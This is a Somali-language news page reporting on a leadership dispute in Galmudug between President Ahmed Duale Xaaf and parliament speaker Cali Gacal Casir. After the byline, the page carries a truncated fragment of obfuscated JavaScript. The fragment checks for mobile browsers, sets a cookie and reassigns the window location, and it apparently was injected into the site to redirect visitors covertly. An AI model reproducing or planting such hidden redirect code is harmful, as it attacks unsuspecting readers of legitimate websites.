Wednesday, January 15, 2025
HomeDhageysiDhageyso:-Warbixin Sheeko Mashaakilkeedu uu Sandhamaan oo Galmudug Lugaha Kula Jirto

Dhageyso:-Warbixin Sheeko Mashaakilkeedu uu Sandhamaan oo Galmudug Lugaha Kula Jirto

Doorashadiii Madaxweyne Xaaf kadib dhowr bilood Galmudug waxa ay lugaha la gashay Qilaaf siyaasideed oo wali aan xal loo helin xiligaana jooga meshii ugu xumeed.

Qilaafkii ugu horeeyay ee hogaanka galmudug ayaa daboolka laga qaaday markii Dowlada Somaliya door dhaxdhaxaadnimo ka qaadatay Qilaafkii wadamada Qaliijka oo Xaaf uu la saftay imaradka Cali Gacal iyo Carabeyna la safteen goa��aankii Dowlada Dhexe.

Xiligaas mudo labo bil ku dhow Galmuudg waxaay gashay xaalad Siyaasadeed oo adag waxana xilalka laga qaaday dhamaan hogaanka sare ee Maamulkaasi sida Madaxweynha ku xigeenkiisa Gudoomiyaha Barlaanka oo xildhibaano la kala safnaa si aan ka tashin badan la heyn xilalka uga xayuubiyeen.

Heshiis ay Dowlada Somaliya hormuud ka aheyd ayaa xiligaasi laga qaaray Qilaafkii Madaxda Galmudug ee ku yimid arimaha Qaliijka oo goa��domiyay Dowlada Qadar.

Mar kale ayaa loo weel tolay Qilaaf xoogan biyo yar kadib markii la guda galay fulinta heshiisyo Galmudug iyo Ahlu sunna jabuuti ku gaareen kaasi oo ku adanaa inay isku biiraan.

Maxamed Xaashi Cabdi oo ah madaxweyne ku xigeenka Galmudug iyo Gudoomiyaha Barlanakga maamulaasi Cali Gacal Casir ayaa ka biyo diiday qaab fulinta heshiiska Ahlu sunna lala galay waxana ay taasi sii xoojisay Qilaafka iyo kala shikiga ka dhax dhashay hogaanka galmudug.

Hada mar kale ayuu heerka qilaafka jira gaarsiiyay masa��uuliyiinta sare ee Galmudug inay xilalka iska qadaan iyagoo adeegsanaya Xildhibaano la kala safan.

Magaalada Cadaado waxay fadhi u tahay Gudoomiyaha Barlamaanka ee la sheegay in xilka laga qaaday iyo Madaxweyne ku xigeenka oo ay isku aragti yihiin,halka Dhuusamareeb ay joogaan Xaaf iyo raga ku aragtida ah.

Cali Gacal Casir oo lagu bilaabay sheekada xil ka qaadista ayaa qaba in Xildhibaanada sheegay inay xilka ka qaadeen aysan aheyn kuwo sharciya oo ka tirsan Barlamaanka Galmudug warka kasoo yeerana uu yahay iska sheeg iyo waxbo kama jiraan.

Gudoomiye Cali Gacal caris ayaa qaba in lagu tuntay sharciyadii Galmudug lagu dhisay iyo heshiiskii Jabuuti taasina ay keeneyso qilaafkaan aan wali xalka loo helin.

Xaaf dhankiisu wax badan kaba danbey Cali Gacal oo kulan deg deg ah Xildhibaano yeeshay ayaa ku dhawaaqay inay xilkii ka xayuubiyeen ku sime madaxwenana uu yahay Maxamed Xaashi Cabdi oo Xaaf ku xigeen ah.

Axmed Ducaale Xaaf ayaa ku dooday in Xildhibaano buuxi kara tiro xil looqa qaado aysan cadaado joojin warka kasoo yeeray Cali Cagalna uu yahay iska fowdo sida uu hadalka u dhiga.

Xaaf waxaa uu sheegay waqti badan in uu ku bixiyay sidii loo dhamey lahaa Qilaafka dhala dhaxeeya madaxda ka hoos shaqeeya ee maamulkiisa balse faragelin kale ay jirto taasi keentay heerka hada la joogo.

W/Q Dahir Farah Ahmed


|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe